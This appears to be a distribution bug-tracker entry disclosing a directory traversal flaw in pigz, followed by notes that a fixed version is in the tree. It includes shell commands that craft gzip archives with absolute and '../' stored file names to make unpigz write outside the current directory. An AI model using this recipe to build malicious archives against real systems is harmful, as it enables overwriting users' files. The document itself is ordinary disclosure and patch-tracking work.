From ${URL} : pigz is susceptible to directory traversal vulnerabilities. While decompressing a file with restoring file name, it (unlike gzip) will happily use absolute and relative paths taken from the input. This can be exploited by a malicious archive to write files outside the current directory. 1. Absolute path. A sample could be prepared in following way: $ touch XtmpXabs $ gzip -c XtmpXabs | sed 's|XtmpXabs|/tmp/abs|g' > abs.gz $ rm XtmpXabs Then check it works: $ ls /tmp/abs ls: cannot access /tmp/abs: No such file or directory $ unpigz -N abs.gz $ ls /tmp/abs /tmp/abs 2. Relative path with "..". A sample could be prepared in following way: $ rm ../rel $ touch XXXrel $ gzip -c XXXrel | sed 's|XXXrel|../rel|g' > rel.gz $ rm XXXrel Then check it works: $ ls ../rel ls: cannot access ../rel: No such file or directory $ unpigz -N rel.gz $ ls ../rel ../rel fix: https://github.com/madler/pigz/commit/fdad1406b3ec809f4954ff7cdf9e99eb18c2458f @maintainer(s): after the bump, in case we need to stabilize the package, please let us know if it is ready for the stabilization or not.
app-arch/pigz-2.3.3 in tree and stable. No vulnerable versions in tree. Fix link in previous comment. GLSA Vote: No